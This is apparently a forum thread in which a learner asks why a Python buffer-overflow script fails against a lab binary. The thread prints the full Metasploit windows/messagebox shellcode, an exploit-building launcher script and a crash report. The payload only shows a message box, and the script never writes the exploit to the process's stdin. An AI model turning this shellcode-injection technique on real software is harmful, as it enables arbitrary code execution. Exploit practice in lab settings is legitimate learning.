Unable to execute hello world shellcode using buffer overflow in win32 using python

I have a binary, which, unfortunately can’t share, downloaded from an online learning platform who has forbidden me to do so. It accepts the input from the stdin and I have triggered buffer overflow from there. Now I am curious how to run messsage box shellcode.

import subprocess
import sys

if len(sys.argv) < 2:
     print("usage: %s TARGET_PATH" % sys.argv[0])

# windows/messagebox - 272 bytes
# https://metasploit.com/
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process, 
# TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
buf =  b""
buf += b"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31"
buf += b"\xc9\x64\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b"
buf += b"\x46\x08\x8b\x7e\x20\x8b\x36\x38\x4f\x18\x75\xf3"
buf += b"\x59\x01\xd1\xff\xe1\x60\x8b\x6c\x24\x24\x8b\x45"
buf += b"\x3c\x8b\x54\x28\x78\x01\xea\x8b\x4a\x18\x8b\x5a"
buf += b"\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01\xee\x31"
buf += b"\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d"
buf += b"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a"
buf += b"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb"
buf += b"\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc3\xb2"
buf += b"\x08\x29\xd4\x89\xe5\x89\xc2\x68\x8e\x4e\x0e\xec"
buf += b"\x52\xe8\x9f\xff\xff\xff\x89\x45\x04\xbb\x7e\xd8"
buf += b"\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff\xff\x89"
buf += b"\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64"
buf += b"\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89"
buf += b"\xe6\x56\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d"
buf += b"\xbc\x87\x1c\x24\x52\xe8\x5f\xff\xff\xff\x68\x6f"
buf += b"\x78\x58\x20\x68\x61\x67\x65\x42\x68\x4d\x65\x73"
buf += b"\x73\x31\xdb\x88\x5c\x24\x0a\x89\xe3\x68\x58\x20"
buf += b"\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f\x6d\x20"
buf += b"\x68\x6f\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9"
buf += b"\x88\x4c\x24\x10\x89\xe1\x31\xd2\x52\x53\x51\x52"
buf += b"\xff\xd0\x31\xc0\x50\xff\x55\x08"

exploit = b"The easiest way to overwrite s"
print("[!] Exploit length %s" % len(exploit))

exploit += buf
print("[!] Exploit + payload length %s" % len(exploit))

print("[!] Launching '%s'" % sys.argv[1])
process = subprocess.Popen(sys.argv[1], stdin=subprocess.PIPE,
                           stdout=subprocess.PIPE, stderr=subprocess.PIPE)

input_data = b"Hello, subprocess!\n" * 100

print("[!] Writing to stdin")

print("[!] Communicate with process interactively")
stdout, stderr = process.communicate()

print("[#] Stdout: %s" % stdout.decode())
print("[#] Stderr: %s" % stderr.decode())

Running this code even triggered the notification

Problem signature:
  Problem Event Name:    APPCRASH
  Application Name:    OverwriteStack.exe
  Application Version:
  Application Timestamp:    5388647a
  Fault Module Name:    StackHash_0a9e
  Fault Module Version:
  Fault Module Timestamp:    00000000
  Exception Code:    c0000005
  Exception Offset:    d99bebd9
  OS Version:    6.1.7600.
  Locale ID:    1033
  Additional Information 1:    0a9e
  Additional Information 2:    0a9e372d3b4ad19135b953a78882e789
  Additional Information 3:    0a9e
  Additional Information 4:    0a9e372d3b4ad19135b953a78882e789

Read our privacy statement online:

If the online privacy statement is not available, please read our privacy statement offline:

There are no canaries, nothing exotic to prevent the buffer overload as I have other network based vulnerable binaries that work perfectly find with metasploit crafted payloads.


If you posted a picture of where the program crashed in a debugger we could help you more.

I want to write binary data to stdin. I am using ollydbg. I tried a lot by copying binary data and pasting onto stdin in the command prompt.

I have done local and remote BOF by opening file, or sending bytes through network. But I dont know how to paste non-human-readable character in the cmd promp.

This topic was automatically closed after 121 days. New replies are no longer allowed.